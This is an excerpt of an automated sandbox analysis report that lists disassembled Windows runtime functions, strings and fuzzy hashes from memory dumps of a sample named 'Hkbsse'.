                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00465720,00000FA0,?,?,0041D117), ref: 0041D145
                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0041D117), ref: 0041D150
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041D117), ref: 0041D161
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041D173
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041D181
                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0041D117), ref: 0041D1A4
                    • ___scrt_fastfail.LIBCMT ref: 0041D1B5
                    • DeleteCriticalSection.KERNEL32(00465720,00000007,?,?,0041D117), ref: 0041D1C0
                    • CloseHandle.KERNEL32(00000000,?,?,0041D117), ref: 0041D1D0
                    Strings
                    • kernel32.dll, xrefs: 0041D15C
                    • WakeAllConditionVariable, xrefs: 0041D179
                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041D14B
                    • SleepConditionVariableCS, xrefs: 0041D16D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                    • API String ID: 3578986977-3242537097
                    • Opcode ID: eb7f23b3963b8d1de8eebd8f77cc568860475fe5b5e112d5d50c84645813196e
                    • Instruction ID: 252a5c44d21d70e961eeb017c792f98daaed356a7d9fc3a6fd8a800735b4e431
                    • Opcode Fuzzy Hash: eb7f23b3963b8d1de8eebd8f77cc568860475fe5b5e112d5d50c84645813196e
                    • Instruction Fuzzy Hash: 82011275A40B11ABD6211B75BC0DB9B3668DB40BA3F540436FD05D23A5EAB9C840CA6E
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004327F1
                      • Part of subcall function 004325EF: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432612
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432812
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 0043281F
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043286D
                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004328F4
                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00432907
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00432954
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                    • String ID:
                    • API String ID: 2530155754-0
                    • Opcode ID: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction ID: 3f1873845dbcbd1064d3a19cd28863eec2e57fe1390348ff4fb73f67cee00bd1
                    • Opcode Fuzzy Hash: bdc39f7d34777ebb482f0357ca3a1e289b937bb94ca1cabbe5f5703e13ac6664
                    • Instruction Fuzzy Hash: 3F81B234900249ABDF1AEF95CA41BBF7B71AF09308F04509AEC407B352C7BA8D15DB69
                    APIs
                    • Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00422951
                      • Part of subcall function 00423C3C: GetVersionExW.KERNEL32(?), ref: 00423C60
                      • Part of subcall function 00423C3C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00423CFF
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422965
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422986
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004229EF
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00422A23
                      • Part of subcall function 004208FD: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0042091D
                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422AA3
                      • Part of subcall function 0042246C: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00422480
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422AEB
                      • Part of subcall function 004208D2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004208EE
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422AFF
                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422B10
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00422B5D
                    • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422B82
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422B8E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
                    • String ID:
                    • API String ID: 4140532746-0
                    • Opcode ID: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction ID: 3497a36c357a9217bd5ea5df72823c379328e9b881d8ed218cbe5642490ce89b
                    • Opcode Fuzzy Hash: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
                    • Instruction Fuzzy Hash: 4881C431B00626ABCB18DFA9EA9057EBBF1BB48304B94413FD441A7751EBF86941CB4D
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0043F446
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043EFFC
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F00E
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F020
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F032
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F044
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F056
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F068
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F07A
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F08C
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F09E
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0B0
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0C2
                      • Part of subcall function 0043EFDF: _free.LIBCMT ref: 0043F0D4
                    • _free.LIBCMT ref: 0043F43B
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F45D
                    • _free.LIBCMT ref: 0043F472
                    • _free.LIBCMT ref: 0043F47D
                    • _free.LIBCMT ref: 0043F49F
                    • _free.LIBCMT ref: 0043F4B2
                    • _free.LIBCMT ref: 0043F4C0
                    • _free.LIBCMT ref: 0043F4CB
                    • _free.LIBCMT ref: 0043F503
                    • _free.LIBCMT ref: 0043F50A
                    • _free.LIBCMT ref: 0043F527
                    • _free.LIBCMT ref: 0043F53F
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction ID: dbd078dc2a70aa704cf8e78683bcdcdf520610d7d758412ab309d08eef7ce9b5
                    • Opcode Fuzzy Hash: 8bfaf0b1e3ab1cea465780dc7689ae2bf9c7475949a29504445176792e6f4866
                    • Instruction Fuzzy Hash: FC318271940300AFDB219A39D806B5773E5AF18314F14642FE094DB292DF3CEC588B29
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 004354B1
                    • type_info::operator==.LIBVCRUNTIME ref: 004354D8
                    • ___TypeMatch.LIBVCRUNTIME ref: 004355E4
                    • CatchIt.LIBVCRUNTIME ref: 00435639
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 004356BF
                    • _UnwindNestedFrames.LIBCMT ref: 00435746
                    • CallUnexpected.LIBVCRUNTIME ref: 00435761
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm$$5
                    • API String ID: 4234981820-3170930526
                    • Opcode ID: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction ID: 2765267077130b143c7d318870dfd271b72c56ee2a1170d1c4f92d41ddd0a8a9
                    • Opcode Fuzzy Hash: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction Fuzzy Hash: 02C19E71800A09EFCF29DFA5C8819AEBBB5BF18315F54505BE8156B301C339EA51CF99
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00423CF6), ref: 0041FB8F
                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 0041FB9D
                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 0041FBAB
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 0041FBD9
                    • GetLastError.KERNEL32(?,?,?,00423CF6), ref: 0041FBF4
                    • GetLastError.KERNEL32(?,?,?,00423CF6), ref: 0041FC00
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FC16
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                    • API String ID: 1654681794-465693683
                    • Opcode ID: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction ID: 2faeb71938919a1c0d9ecc2d1d00a42f8f566497dce8370ae698b9c1d05c50ed
                    • Opcode Fuzzy Hash: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction Fuzzy Hash: DA01C879604321AF97002BB9BC49FEB36ACA904716720043BF901D1293FE7CD849976C
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 044B5718
                    • type_info::operator==.LIBVCRUNTIME ref: 044B573F
                    • ___TypeMatch.LIBVCRUNTIME ref: 044B584B
                    • CatchIt.LIBVCRUNTIME ref: 044B58A0
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 044B5926
                    • _UnwindNestedFrames.LIBCMT ref: 044B59AD
                    • CallUnexpected.LIBVCRUNTIME ref: 044B59C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 4234981820-393685449
                    • Opcode ID: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction ID: 722f910bf838467c6c8349a34855e48d12c0ebd2c92c0f7f05b1e2d132a3ffce
                    • Opcode Fuzzy Hash: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction Fuzzy Hash: 8EC12871900209EBDF29DFA5C8809EEFBB5AF04329F04455BE8956B212D731E961CFE1
                    APIs
                      • Part of subcall function 00441815: CreateFileW.KERNEL32(00000000,00000000,?,00441C05,?,?,00000000,?,00441C05,00000000,0000000C), ref: 00441832
                    • GetLastError.KERNEL32 ref: 00441C70
                    • __dosmaperr.LIBCMT ref: 00441C77
                    • GetFileType.KERNEL32(00000000), ref: 00441C83
                    • GetLastError.KERNEL32 ref: 00441C8D
                    • __dosmaperr.LIBCMT ref: 00441C96
                    • CloseHandle.KERNEL32(00000000), ref: 00441CB6
                    • CloseHandle.KERNEL32(0043AD32), ref: 00441E03
                    • GetLastError.KERNEL32 ref: 00441E35
                    • __dosmaperr.LIBCMT ref: 00441E3C
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: 5f6fa597f04e21c83b9050f74f27f75d912a23b265ca40419967d6c3ad7266dc
                    • Instruction ID: 112139b02b37b4a3a6abafbf4eec10d106d9ccfade03311548451970410361b9
                    • Opcode Fuzzy Hash: 5f6fa597f04e21c83b9050f74f27f75d912a23b265ca40419967d6c3ad7266dc
                    • Instruction Fuzzy Hash: E2A14A32A142458FEF19DF68DC91BAE3BA1EB0A324F14015EF811AB3A1D7399C42C759
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432A90
                      • Part of subcall function 004325EF: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432612
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432AB1
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00432ABE
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00432B0C
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432BB4
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432BE6
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction ID: 5e49a0710176f9ffb610bd551467bf7c1da036f6e9237cc3336f808c64588d21
                    • Opcode Fuzzy Hash: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction Fuzzy Hash: 99719030900209ABDF15DF54DA41ABFBBB2AF49304F04609AEC416B352C7B9DD16DB69
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 044B2CF7
                      • Part of subcall function 044B2856: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044B2879
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 044B2D18
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 044B2D25
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 044B2D73
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 044B2E1B
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 044B2E4D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction ID: cca38fb206fdd1645ef2b7b7d0dc7778851a98da13d2ba7ed17d7c0def3a9eb5
                    • Opcode Fuzzy Hash: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction Fuzzy Hash: AB71AD70900249ABEF15DF59C888AFF7B76BF45304F04409AEC816B392C7B5A816DBB1
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00426B2F
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426B61
                    • List.LIBCONCRT ref: 00426B9C
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426BAD
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426BC9
                    • List.LIBCONCRT ref: 00426C04
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426C15
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426C30
                    • List.LIBCONCRT ref: 00426C6B
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426C78
                      • Part of subcall function 00425FEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426007
                      • Part of subcall function 00425FEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426019
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: 37c50e48faffa15a5835890cc86fa27e9627dd6e10cbd905bce2715576e74200
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: 86517071B00229ABDB04DF55D595BEEB7B8FF08304F4140AAE9459B381DB38AE44CB94
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 044A6D96
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 044A6DC8
                    • List.LIBCONCRT ref: 044A6E03
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 044A6E14
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 044A6E30
                    • List.LIBCONCRT ref: 044A6E6B
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 044A6E7C
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044A6E97
                    • List.LIBCONCRT ref: 044A6ED2
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 044A6EDF
                      • Part of subcall function 044A6256: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044A626E
                      • Part of subcall function 044A6256: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044A6280
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: 5da26a29e79220dd443114ff5bff9ed77c69f01c49d3b6f560ffc92d4f48915e
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: 84517171A00219AFEF14DF65C594BEEB7B8BF18348F45406AD945AB381DB30BE15CB90
                    APIs
                    • _free.LIBCMT ref: 0043A60F
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043A61B
                    • _free.LIBCMT ref: 0043A626
                    • _free.LIBCMT ref: 0043A631
                    • _free.LIBCMT ref: 0043A63C
                    • _free.LIBCMT ref: 0043A647
                    • _free.LIBCMT ref: 0043A652
                    • _free.LIBCMT ref: 0043A65D
                    • _free.LIBCMT ref: 0043A668
                    • _free.LIBCMT ref: 0043A676
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction ID: dafaea9898a024bbeaf4eb5fa5a9bd5eb26c9af27a77b3f713287ac740e7ce33
                    • Opcode Fuzzy Hash: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction Fuzzy Hash: 5721EA76980208BFCB02EF95C882CDE7BB9BF08344F00556AF5559F121DB39EA58CB95
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00447CAF), ref: 00445B3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: dea9b2b477d79067893bb5005812e2be1a4e6301d490f468fa664dc5d61788b9
                    • Instruction ID: 82c09db9cbec65f831423c8afe244374c316664d9e9191f84e2616e9823b9814
                    • Opcode Fuzzy Hash: dea9b2b477d79067893bb5005812e2be1a4e6301d490f468fa664dc5d61788b9
                    • Instruction Fuzzy Hash: 57518C70804E0ADBEF109F99E88C5AEBFB0FF05315F108157D981A6356CB788A19DF59
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004274C0
                    • SwitchToThread.KERNEL32(?), ref: 004274E3
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00427502
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0042751E
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00427529
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00427550
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
                    • String ID: count$ppVirtualProcessorRoots
                    • API String ID: 3791123369-3650809737
                    • Opcode ID: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction ID: fc4521544dbb6807429d0765a6944cf8e671c5b6cf8d6aaa99cb8baaa305a527
                    • Opcode Fuzzy Hash: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction Fuzzy Hash: B6218734B00325AFCB00EF55D595AAEBBB5BF05315F9040AAE901A7352DB38AE45CB58
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00426F46
                    • GetCurrentProcess.KERNEL32 ref: 00426F4E
                    • DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00426F63
                    • SafeRWList.LIBCONCRT ref: 00426F83
                      • Part of subcall function 00424F7E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00424F8F
                      • Part of subcall function 00424F7E: List.LIBCMT ref: 00424F99
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00426F95
                    • GetLastError.KERNEL32 ref: 00426FA4
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00426FBA
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                    • String ID: eventObject
                    • API String ID: 165577817-1680012138
                    • Opcode ID: f60108b339336b36486ca6d42982c1fe9e2fd9d4e50230e8ef23f6bb8518d1a3
                    • Instruction ID: df3dab38d58adcbe0854f5ec81775a9d2d7f31f209f9ace54438c2a0d187fe5a
                    • Opcode Fuzzy Hash: f60108b339336b36486ca6d42982c1fe9e2fd9d4e50230e8ef23f6bb8518d1a3
